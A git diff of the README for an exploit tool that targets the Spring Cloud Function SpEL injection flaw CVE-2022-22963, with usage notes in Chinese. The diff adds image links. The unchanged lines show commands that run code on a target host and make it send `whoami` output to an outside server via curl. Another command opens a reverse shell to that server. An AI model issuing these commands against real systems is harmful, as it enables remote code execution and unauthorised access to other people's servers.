diff --git a/README.md b/README.md
index c6fbafa..bd69ac7 100644
--- a/README.md
+++ b/README.md
@@ -27,7 +27,7 @@ options:
 ```
 .\Spring-cloud-function-spel0.2.exe --help
 ```
-![image]()
+![image](https://github.com/charis3306/CVE-2022-22963/blob/main/1.png)
 
 > 默认检测--check 是必须选，--route是漏洞存在的路由。
 注意如果不借助dnslog 或sleep 进行探测会存有误报！
@@ -35,13 +35,13 @@ options:
 .\Spring-cloud-function-spel0.2.exe --check post --url http://www.charis3306.top
 ```
 
-![image]()
+![image](https://github.com/charis3306/CVE-2022-22963/blob/main/2.png)
 
 ##### 执行命令验证是否能利用
 ```
 .\Spring-cloud-function-spel0.2.exe --check post --url http://154.83.15.150:8080/ --cmd "curl http://154.211.12.40:9999/`whoami`"
 ```
-![image]()
+![image](https://github.com/charis3306/CVE-2022-22963/blob/main/3.png)
 
 
 ##### 反弹shell
@@ -50,7 +50,7 @@ options:
 .\Spring-cloud-function-spel0.2.exe --check post --url http://154.83.15.150:8080/ --ip 154.211.12.40 --port 9999
 ```
 
-![image]()
+![image](https://github.com/charis3306/CVE-2022-22963/blob/main/4.png)